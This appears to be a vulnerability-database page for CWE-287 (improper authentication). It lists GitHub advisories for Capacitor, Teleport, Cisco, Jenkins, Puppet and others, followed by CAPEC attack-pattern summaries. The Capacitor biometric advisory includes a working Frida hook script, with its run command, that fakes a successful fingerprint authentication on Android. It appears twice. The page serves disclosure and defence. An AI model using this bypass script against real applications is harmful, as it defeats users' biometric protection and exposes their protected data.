CWE-287
DiscouragedImproper Authentication
Abstraction: Class · Status: Draft
When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.
5977 vulnerabilities reference this CWE, most recent first.
GHSA-VX5F-VMR6-32WF
Vulnerability from github – Published: 2026-02-10 14:33 – Updated: 2026-02-12 20:25There is a potential issue with the cap-go/capacitor-native-biometric library.
Summary
The cap-go/capacitor-native-biometric library was found to be subject to an authentication bypass as the current implementation of the onAuthenticationSucceeded() does not appear to handle a CryptoObject^HackTricks1 as seen in the following code block starting from line 88 in AuthActivity.java:
@Override
public void onAuthenticationSucceeded(
@NonNull BiometricPrompt.AuthenticationResult result
) {
super.onAuthenticationSucceeded(result);
finishActivity("success");
}
As the current implementation only checks whether onAuthenticationSucceeded() was called and does not handle a CryptoObject the biometric authentication can be bypassed by hooking the onAuthenticationSucceeded() function.
PoC Video:
https://github.com/user-attachments/assets/b7b5a2bc-21dc-4373-b371-84b002dae7a7
Environment:
The following steps were taken to create and deploy a Capacitor application using the cap-go/capacitor-native-biometric library for the purpose of verifying this finding. Note at the time of writing the npx create-react-app command broke, so I have provided two ways of creating and deploying the testing environment. Apparently React updated to version 19 caused a dependency issue as seen here. If it is not fixed by the time you look at this PoC please use the yarn alternatives.
- Create a new Capacitor app by opening your terminal and run the following commands to create a new Capacitor app. For the sake of the disclosure I'll be using the name
capgo-poc:
npx create-react-app capgo-poc --template typescript
Yarn Alternative:
npm install --global yarn
yarn create react-app capgo-poc --template typescript
- Install dependencies by navigating into your app's directory and run the following command to install Capacitor's core dependencies:
cd capgo-poc
npm install @capacitor/core
npm install @capacitor/cli
npm install @capacitor/android
npm install @capgo/capacitor-native-biometric
npm install react
Yarn Alternative:
cd capgo-poc
yarn add @capacitor/core
yarn add @capacitor/cli
yarn add @capacitor/android
yarn add @capgo/capacitor-native-biometric
yarn add react
- Initialise the project using the name
capgo-pocandcom.capgo.poc, and add the android platform by running the following commands:
npx cap init
npx cap add android
- Configure the android permissions by opening the
android/app/src/main/AndroidManifest.xmlfile and add the necessary permissions:
<uses-permission android:name="android.permission.USE_BIOMETRIC" />
<uses-permission android:name="android.permission.USE_FINGERPRINT" />
- Implement Biometric Authentication, here is some basic code to use the biometric authentication feature. Modify the TSX file called
App.tsxinsrc/and import the following code:
import React, { useState } from 'react';
import { NativeBiometric } from '@capgo/capacitor-native-biometric';
const App = () => {
// State to hold authentication status
const [authStatus, setAuthStatus] = useState<string | null>(null);
// Function to authenticate the user
const authenticateUser = async () => {
try {
const result = await NativeBiometric.verifyIdentity({
reason: 'For an application access',
title: 'Log in',
subtitle: '',
description: 'Verify yourself by biometrics',
useFallback: true,
maxAttempts: 3,
}).then(() => true)
.catch(() => false);
if (!result) {
setAuthStatus('failed');
} else {
setAuthStatus('success');
}
} catch (error) {
console.error('Error during biometric verification:', error);
setAuthStatus('error');
}
};
return (
<div>
<h1>CAP-GO Capacitor Native Biometric Authentication</h1>
<button onClick={authenticateUser}>Authenticate with Biometrics</button>
{/* Conditionally render based on authentication status */}
{authStatus === 'success' && <h2>CAP-GO Capacitor Native Biometric Authentication Success</h2>}
{authStatus === 'failed' && <h2>CAP-GO Capacitor Native Biometric Authentication Failed</h2>}
{authStatus === 'error' && <h2>Error during authentication</h2>}
</div>
);
};
export default App;
- Build the React project, synchronise it with the Android platform, and open the native Android project in Android Studio by running the following commands:
npm run build
npx cap sync android
npx cap open android
Yarn alternative:
yarn build
npx cap sync android
npx cap open android
Exploitation:
For the purpose of demonstrating the vulnerability we will be using frida and a rooted emulator from android studio. Frida is a dynamic instrumentation toolkit used as part of pentesting mobile applications ^frida.
Note that a rooted emulator is not necessary, but is being used for simplicity to demonstrate the vulnerability.
- Copy the below frida script to a JavaScript file and run it to hook the
onAuthenticationSucceeded()function, abusing thenull CryptoObject. This can be done by running the following command:
frida -U -l <PAYLOAD> -n 'capgo-poc'
Payload
Java.perform(function () {
hookBiometricPrompt();
});
function getBiometricAuthResult(resultObj, cryptoInst) {
var authenticationResultInst = resultObj.$new(cryptoInst, 0);
return authenticationResultInst;
};
function getBiometricPromptResult() {
var cryptoObj = Java.use('android.hardware.biometrics.BiometricPrompt$CryptoObject');
var cryptoInst = cryptoObj.$new(null);
var authenticationResultObj = Java.use('android.hardware.biometrics.BiometricPrompt$AuthenticationResult');
var authenticationResultInst = getBiometricAuthResult(authenticationResultObj, cryptoInst);
return authenticationResultInst
};
function hookBiometricPrompt() {
var biometricPrompt = Java.use('android.hardware.biometrics.BiometricPrompt')['authenticate'].overload('android.os.CancellationSignal', 'java.util.concurrent.Executor', 'android.hardware.biometrics.BiometricPrompt$AuthenticationCallback');
console.log("Hooking BiometricPrompt.authenticate()...");
biometricPrompt.implementation = function (cancellationSignal, executor, callback) {
var authenticationResultInst = getBiometricPromptResult();
callback.onAuthenticationSucceeded(authenticationResultInst);
}
};
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@capgo/capacitor-native-biometric"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.3.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-10T14:33:50Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "There is a potential issue with the [cap-go/capacitor-native-biometric](https://github.com/Cap-go/capacitor-native-biometric) library. \n\n---\n\n## Summary\n\nThe [cap-go/capacitor-native-biometric](https://github.com/Cap-go/capacitor-native-biometric) library was found to be subject to an authentication bypass as the current implementation of the `onAuthenticationSucceeded()` does not appear to handle a `CryptoObject`[^HackTricks1] [^SecuringBiometricAuthentication] as seen in the following code block starting from [line 88 in AuthActivity.java](https://github.com/Cap-go/capacitor-native-biometric/blob/main/android/src/main/java/ee/forgr/biometric/AuthActivity.java#L88):\n\n```java\n@Override\n public void onAuthenticationSucceeded(\n @NonNull BiometricPrompt.AuthenticationResult result\n ) {\n super.onAuthenticationSucceeded(result);\n finishActivity(\"success\");\n }\n```\n\nAs the current implementation only checks whether `onAuthenticationSucceeded()` was called and does not handle a `CryptoObject` the biometric authentication can be bypassed by hooking the `onAuthenticationSucceeded()` function. \n\n## PoC Video:\n\nhttps://github.com/user-attachments/assets/b7b5a2bc-21dc-4373-b371-84b002dae7a7\n\n## Environment:\n\nThe following steps were taken to create and deploy a Capacitor application using the `cap-go/capacitor-native-biometric library` for the purpose of verifying this finding. Note at the time of writing the `npx create-react-app` command broke, so I have provided two ways of creating and deploying the testing environment. Apparently React updated to version 19 caused a dependency issue as seen [here](https://github.com/facebook/create-react-app/issues/13715). If it is not fixed by the time you look at this PoC please use the yarn alternatives. \n\n1. Create a new Capacitor app by opening your terminal and run the following commands to create a new Capacitor app. For the sake of the disclosure I\u0027ll be using the name `capgo-poc`: \n\n```sh\nnpx create-react-app capgo-poc --template typescript\n```\n\nYarn Alternative:\n\n```sh\nnpm install --global yarn\nyarn create react-app capgo-poc --template typescript\n```\n\n2. Install dependencies by navigating into your app\u0027s directory and run the following command to install Capacitor\u0027s core dependencies:\n\n```sh\ncd capgo-poc\nnpm install @capacitor/core \nnpm install @capacitor/cli \nnpm install @capacitor/android\nnpm install @capgo/capacitor-native-biometric\nnpm install react\n```\n\nYarn Alternative:\n\n```sh\ncd capgo-poc\nyarn add @capacitor/core \nyarn add @capacitor/cli \nyarn add @capacitor/android\nyarn add @capgo/capacitor-native-biometric\nyarn add react\n```\n\n3. Initialise the project using the name `capgo-poc` and `com.capgo.poc`, and add the android platform by running the following commands:\n\n```sh\nnpx cap init\nnpx cap add android\n```\n\n4. Configure the android permissions by opening the `android/app/src/main/AndroidManifest.xml` file and add the necessary permissions:\n\n```xml\n\u003cuses-permission android:name=\"android.permission.USE_BIOMETRIC\" /\u003e\n\u003cuses-permission android:name=\"android.permission.USE_FINGERPRINT\" /\u003e\n```\n\n5. Implement Biometric Authentication, here is some basic code to use the biometric authentication feature. Modify the TSX file called `App.tsx` in `src/` and import the following code:\n\n```js\nimport React, { useState } from \u0027react\u0027;\nimport { NativeBiometric } from \u0027@capgo/capacitor-native-biometric\u0027;\n\nconst App = () =\u003e {\n // State to hold authentication status\n const [authStatus, setAuthStatus] = useState\u003cstring | null\u003e(null);\n\n // Function to authenticate the user\n const authenticateUser = async () =\u003e {\n try {\n const result = await NativeBiometric.verifyIdentity({\n reason: \u0027For an application access\u0027,\n title: \u0027Log in\u0027,\n subtitle: \u0027\u0027,\n description: \u0027Verify yourself by biometrics\u0027,\n useFallback: true,\n maxAttempts: 3,\n }).then(() =\u003e true)\n .catch(() =\u003e false);\n\n if (!result) {\n setAuthStatus(\u0027failed\u0027);\n } else {\n setAuthStatus(\u0027success\u0027);\n }\n } catch (error) {\n console.error(\u0027Error during biometric verification:\u0027, error);\n setAuthStatus(\u0027error\u0027);\n }\n };\n\n return (\n \u003cdiv\u003e\n \u003ch1\u003eCAP-GO Capacitor Native Biometric Authentication\u003c/h1\u003e\n \u003cbutton onClick={authenticateUser}\u003eAuthenticate with Biometrics\u003c/button\u003e\n\n {/* Conditionally render based on authentication status */}\n {authStatus === \u0027success\u0027 \u0026\u0026 \u003ch2\u003eCAP-GO Capacitor Native Biometric Authentication Success\u003c/h2\u003e}\n {authStatus === \u0027failed\u0027 \u0026\u0026 \u003ch2\u003eCAP-GO Capacitor Native Biometric Authentication Failed\u003c/h2\u003e}\n {authStatus === \u0027error\u0027 \u0026\u0026 \u003ch2\u003eError during authentication\u003c/h2\u003e}\n \u003c/div\u003e\n );\n};\n\nexport default App;\n```\n\n6. Build the React project, synchronise it with the Android platform, and open the native Android project in Android Studio by running the following commands:\n\n```sh\nnpm run build\nnpx cap sync android \nnpx cap open android\n```\n\nYarn alternative:\n\n```sh\nyarn build\nnpx cap sync android \nnpx cap open android\n```\n\n## Exploitation:\n\nFor the purpose of demonstrating the vulnerability we will be using frida and a rooted emulator from android studio. Frida is a dynamic instrumentation toolkit used as part of pentesting mobile applications [^frida]. \n\nNote that a rooted emulator is not necessary, but is being used for simplicity to demonstrate the vulnerability. \n\n1. Copy the below frida script to a JavaScript file and run it to hook the `onAuthenticationSucceeded()` function, abusing the `null CryptoObject`. This can be done by running the following command:\n\n```sh\nfrida -U -l \u003cPAYLOAD\u003e -n \u0027capgo-poc\u0027\n```\n\n### Payload\n```js\nJava.perform(function () {\n hookBiometricPrompt();\n});\n\nfunction getBiometricAuthResult(resultObj, cryptoInst) {\n var authenticationResultInst = resultObj.$new(cryptoInst, 0);\n return authenticationResultInst;\n};\n\nfunction getBiometricPromptResult() {\n var cryptoObj = Java.use(\u0027android.hardware.biometrics.BiometricPrompt$CryptoObject\u0027);\n var cryptoInst = cryptoObj.$new(null);\n var authenticationResultObj = Java.use(\u0027android.hardware.biometrics.BiometricPrompt$AuthenticationResult\u0027);\n var authenticationResultInst = getBiometricAuthResult(authenticationResultObj, cryptoInst);\n return authenticationResultInst\n};\n\nfunction hookBiometricPrompt() {\n var biometricPrompt = Java.use(\u0027android.hardware.biometrics.BiometricPrompt\u0027)[\u0027authenticate\u0027].overload(\u0027android.os.CancellationSignal\u0027, \u0027java.util.concurrent.Executor\u0027, \u0027android.hardware.biometrics.BiometricPrompt$AuthenticationCallback\u0027);\n console.log(\"Hooking BiometricPrompt.authenticate()...\");\n biometricPrompt.implementation = function (cancellationSignal, executor, callback) {\n var authenticationResultInst = getBiometricPromptResult();\n callback.onAuthenticationSucceeded(authenticationResultInst);\n }\n};\n```\n\n[^SecuringBiometricAuthentication]: https://www.kayssel.com/post/android-8/\n[^HackTricks1]: https://book.hacktricks.xyz/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android#method-1-bypassing-with-no-crypto-object-usage\n[^frida]: https://frida.re/",
"id": "GHSA-vx5f-vmr6-32wf",
"modified": "2026-02-12T20:25:16Z",
"published": "2026-02-10T14:33:50Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Cap-go/capgo/security/advisories/GHSA-vx5f-vmr6-32wf"
},
{
"type": "WEB",
"url": "https://github.com/Cap-go/capacitor-native-biometric/commit/1254602e942f8216e6258f646f0866d8e69c48a5"
},
{
"type": "PACKAGE",
"url": "https://github.com/Cap-go/capgo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "cap-go/capacitor-native-biometric Authentication Bypass"
}
GHSA-VX7M-HM5R-82W3
Vulnerability from github – Published: 2022-05-24 19:15 – Updated: 2022-07-13 00:01Teleport before 4.4.11, 5.x before 5.2.4, 6.x before 6.2.12, and 7.x before 7.1.1 allows forgery of SSH host certificates in some situations.
{
"affected": [],
"aliases": [
"CVE-2021-41393"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-18T16:15:00Z",
"severity": "CRITICAL"
},
"details": "Teleport before 4.4.11, 5.x before 5.2.4, 6.x before 6.2.12, and 7.x before 7.1.1 allows forgery of SSH host certificates in some situations.",
"id": "GHSA-vx7m-hm5r-82w3",
"modified": "2022-07-13T00:01:41Z",
"published": "2022-05-24T19:15:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41393"
},
{
"type": "WEB",
"url": "https://github.com/gravitational/teleport/releases/tag/v4.4.11"
},
{
"type": "WEB",
"url": "https://github.com/gravitational/teleport/releases/tag/v5.2.4"
},
{
"type": "WEB",
"url": "https://github.com/gravitational/teleport/releases/tag/v6.2.12"
},
{
"type": "WEB",
"url": "https://github.com/gravitational/teleport/releases/tag/v7.1.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VX84-H8R2-7438
Vulnerability from github – Published: 2022-05-24 17:19 – Updated: 2024-04-04 02:52A vulnerability in Cisco IOS XE SD-WAN Software could allow an unauthenticated, physical attacker to bypass authentication and gain unrestricted access to the root shell of an affected device. The vulnerability exists because the affected software has insufficient authentication mechanisms for certain commands. An attacker could exploit this vulnerability by stopping the boot initialization of an affected device. A successful exploit could allow the attacker to bypass authentication and gain unrestricted access to the root shell of the affected device.
{
"affected": [],
"aliases": [
"CVE-2020-3216"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-06-03T18:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in Cisco IOS XE SD-WAN Software could allow an unauthenticated, physical attacker to bypass authentication and gain unrestricted access to the root shell of an affected device. The vulnerability exists because the affected software has insufficient authentication mechanisms for certain commands. An attacker could exploit this vulnerability by stopping the boot initialization of an affected device. A successful exploit could allow the attacker to bypass authentication and gain unrestricted access to the root shell of the affected device.",
"id": "GHSA-vx84-h8r2-7438",
"modified": "2024-04-04T02:52:16Z",
"published": "2022-05-24T17:19:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-3216"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-auth-b-NzwhJHH7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VXC2-R94Q-8PP5
Vulnerability from github – Published: 2022-05-13 01:49 – Updated: 2022-05-13 01:49An issue was discovered in Descor Infocad FM before 3.1.0.0. An unauthenticated web service allows the retrieval of files on the web server and on reachable SMB servers.
{
"affected": [],
"aliases": [
"CVE-2018-13789"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-10-10T21:29:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in Descor Infocad FM before 3.1.0.0. An unauthenticated web service allows the retrieval of files on the web server and on reachable SMB servers.",
"id": "GHSA-vxc2-r94q-8pp5",
"modified": "2022-05-13T01:49:50Z",
"published": "2022-05-13T01:49:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-13789"
},
{
"type": "WEB",
"url": "https://www.quantumleap.it/infocad-facility-management-cve-2018-13789-unauthenticated-webservice-allows-retrieval-arbitrary-files"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VXC6-WVH8-FPXW
Vulnerability from github – Published: 2022-05-17 03:53 – Updated: 2024-03-05 14:37Jenkins before 1.551 and LTS before 1.532.2 does not invalidate the API token when a user is deleted, which allows remote authenticated users to retain access via the token.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.main:jenkins-core"
},
"ranges": [
{
"events": [
{
"introduced": "1.533"
},
{
"fixed": "1.551"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.main:jenkins-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.532.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2014-2062"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2024-03-05T14:37:53Z",
"nvd_published_at": "2014-10-17T15:55:00Z",
"severity": "MODERATE"
},
"details": "Jenkins before 1.551 and LTS before 1.532.2 does not invalidate the API token when a user is deleted, which allows remote authenticated users to retain access via the token.",
"id": "GHSA-vxc6-wvh8-fpxw",
"modified": "2024-03-05T14:37:53Z",
"published": "2022-05-17T03:53:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-2062"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/jenkins/commit/5548b5220cfd496831b5721124189ff18fbb12a3"
},
{
"type": "PACKAGE",
"url": "https://github.com/jenkinsci/jenkins"
},
{
"type": "WEB",
"url": "https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2014-02-14"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2014/02/21/2"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Jenkins does not invalidate the API token when a user is deleted"
}
GHSA-VXF6-W9MP-95HM
Vulnerability from github – Published: 2017-10-24 18:33 – Updated: 2023-05-12 17:24lib/puppet/network/authstore.rb in Puppet before 2.7.18, and Puppet Enterprise before 2.5.2, supports use of IP addresses in certnames without warning of potential risks, which might allow remote attackers to spoof an agent by acquiring a previously used IP address.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "puppet"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.7.18"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2012-3408"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:58:51Z",
"nvd_published_at": "2012-08-06T16:55:00Z",
"severity": "LOW"
},
"details": "`lib/puppet/network/authstore.rb` in Puppet before 2.7.18, and Puppet Enterprise before 2.5.2, supports use of IP addresses in certnames without warning of potential risks, which might allow remote attackers to spoof an agent by acquiring a previously used IP address.",
"id": "GHSA-vxf6-w9mp-95hm",
"modified": "2023-05-12T17:24:42Z",
"published": "2017-10-24T18:33:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-3408"
},
{
"type": "WEB",
"url": "https://github.com/puppetlabs/puppet/commit/ab9150baa1b738467a33b01df1d90e076253fbbd"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=839166"
},
{
"type": "PACKAGE",
"url": "https://github.com/puppetlabs/puppet"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puppet/CVE-2012-3408.yml"
},
{
"type": "WEB",
"url": "https://www.puppet.com/security/cve/cve-2012-3408-agent-impersonation"
},
{
"type": "WEB",
"url": "http://puppetlabs.com/security/cve/cve-2012-3408"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Puppet supports use of IP addresses in certnames without warning of potential risks"
}
GHSA-VXFG-523G-29HW
Vulnerability from github – Published: 2024-01-07 12:30 – Updated: 2024-01-07 12:30A vulnerability was found in Uniway Router 2.0. It has been declared as critical. This vulnerability affects unknown code of the component Administrative Web Interface. The manipulation leads to reliance on ip address for authentication. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. VDB-249766 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2023-7211"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-291"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-07T10:15:08Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in Uniway Router 2.0. It has been declared as critical. This vulnerability affects unknown code of the component Administrative Web Interface. The manipulation leads to reliance on ip address for authentication. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. VDB-249766 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-vxfg-523g-29hw",
"modified": "2024-01-07T12:30:30Z",
"published": "2024-01-07T12:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7211"
},
{
"type": "WEB",
"url": "https://drive.google.com/file/d/11thSuALGcn0C_9tbmYu8_QzTXtBnCoNS/view?usp=sharing"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.249766"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.249766"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-VXGX-3742-3JJ5
Vulnerability from github – Published: 2024-10-20 06:31 – Updated: 2024-10-20 06:31A vulnerability has been found in didi DDMQ 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the component Console Module. The manipulation with the input /;login leads to improper authentication. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2024-10173"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-20T05:15:02Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been found in didi DDMQ 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the component Console Module. The manipulation with the input /;login leads to improper authentication. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-vxgx-3742-3jj5",
"modified": "2024-10-20T06:31:06Z",
"published": "2024-10-20T06:31:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10173"
},
{
"type": "WEB",
"url": "https://github.com/didi/DDMQ/issues/37"
},
{
"type": "WEB",
"url": "https://github.com/didi/DDMQ/issues/37#issue-2577905007"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.280957"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.280957"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.421516"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-VXM7-2JJX-JGHH
Vulnerability from github – Published: 2022-05-24 17:24 – Updated: 2024-01-13 06:30An improper authentication vulnerability exists in Pulse Connect Secure <9.1RB that allows an attacker with a users primary credentials to bypass the Google TOTP.
{
"affected": [],
"aliases": [
"CVE-2020-8206"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-07-30T13:15:00Z",
"severity": "HIGH"
},
"details": "An improper authentication vulnerability exists in Pulse Connect Secure \u003c9.1RB that allows an attacker with a users primary credentials to bypass the Google TOTP.",
"id": "GHSA-vxm7-2jjx-jghh",
"modified": "2024-01-13T06:30:22Z",
"published": "2022-05-24T17:24:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8206"
},
{
"type": "WEB",
"url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44516"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VXQG-R9MF-H85V
Vulnerability from github – Published: 2022-04-23 00:03 – Updated: 2022-05-10 00:00An authentication bypass vulnerability was discovered in the web interface of the Lenovo Fan Power Controller2 (FPC2) and Lenovo System Management Module (SMM) firmware that could allow an unauthenticated attacker to execute commands on the SMM and FPC2. SMM2 is not affected.
{
"affected": [],
"aliases": [
"CVE-2021-3849"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-04-22T21:15:00Z",
"severity": "CRITICAL"
},
"details": "An authentication bypass vulnerability was discovered in the web interface of the Lenovo Fan Power Controller2 (FPC2) and Lenovo System Management Module (SMM) firmware that could allow an unauthenticated attacker to execute commands on the SMM and FPC2. SMM2 is not affected.",
"id": "GHSA-vxqg-r9mf-h85v",
"modified": "2022-05-10T00:00:45Z",
"published": "2022-04-23T00:03:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3849"
},
{
"type": "WEB",
"url": "https://support.lenovo.com/us/en/product_security/LEN-72615"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Strategy: Libraries or Frameworks
Use an authentication framework or library such as the OWASP ESAPI Authentication feature.
CAPEC-114: Authentication Abuse
An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.
CAPEC-115: Authentication Bypass
An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place.
CAPEC-151: Identity Spoofing
Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.
CAPEC-194: Fake the Source of Data
An adversary takes advantage of improper authentication to provide data or services under a falsified identity. The purpose of using the falsified identity may be to prevent traceability of the provided data or to assume the rights granted to another individual. One of the simplest forms of this attack would be the creation of an email message with a modified "From" field in order to appear that the message was sent from someone other than the actual sender. The root of the attack (in this case the email system) fails to properly authenticate the source and this results in the reader incorrectly performing the instructed action. Results of the attack vary depending on the details of the attack, but common results include privilege escalation, obfuscation of other attacks, and data corruption/manipulation.
CAPEC-22: Exploiting Trust in Client
An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
CAPEC-57: Utilizing REST's Trust in the System Resource to Obtain Sensitive Data
This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.
CAPEC-593: Session Hijacking
This type of attack involves an adversary that exploits weaknesses in an application's use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.
CAPEC-633: Token Impersonation
An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.
CAPEC-650: Upload a Web Shell to a Web Server
By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a "gateway" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.
CAPEC-94: Adversary in the Middle (AiTM)
An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.